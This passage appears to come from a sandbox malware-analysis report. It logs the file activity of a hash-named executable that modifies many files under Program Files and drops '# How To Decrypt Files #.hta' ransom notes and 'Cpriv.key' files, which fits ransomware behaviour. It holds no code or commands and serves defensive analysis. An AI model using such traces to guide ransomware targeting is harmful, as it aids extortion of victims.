Workflow Foundation\v3.5\Workflow.VisualBasic.Targets de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_hov.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105368.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\1033\README.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_left_over.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Newsprint.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Clarity.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00898_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\WidevineCdm\_platform_specific\win_x64\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Publisher.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\BOLDSTRI\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14833_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01631_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01848_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02356_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21399_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ExecutiveReport.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RIPPLE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382966.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19695_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00538_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Grid.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSOUC_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR46F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\MSMAPI\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105520.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00167_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01163_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02441_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18213_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PSRCHSRN.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Groove.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ACCWIZ\ACWZUSR12.ACCDU de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART13.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN011.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02368_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us\PSS10O.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187647.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02790_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\et\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\lua\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099188.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02262_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198022.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\subscription.xsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN092.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\DEEPBLUE\DEEPBLUE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0197983.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\WidevineCdm\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14529_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBBTN.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SLATE\SLATE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00526_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00834_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Urban.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDREQS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\VelvetRose.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGTOC.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08808_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\Microsoft\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18216_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CATWIZ11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\es-419.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_06.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Adjacency.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01138_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\30.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\IRIS\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237759.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_alignright.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\MENU.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Defender\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-next-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitemask1047.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_selectionsubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEWBY.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PROGRAM.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\PowerPoint.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PROFILE\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0157995.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.HK.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\3.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\heart_glass_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099177.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsMacroTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENV98SP.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SLATE\SLATE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program 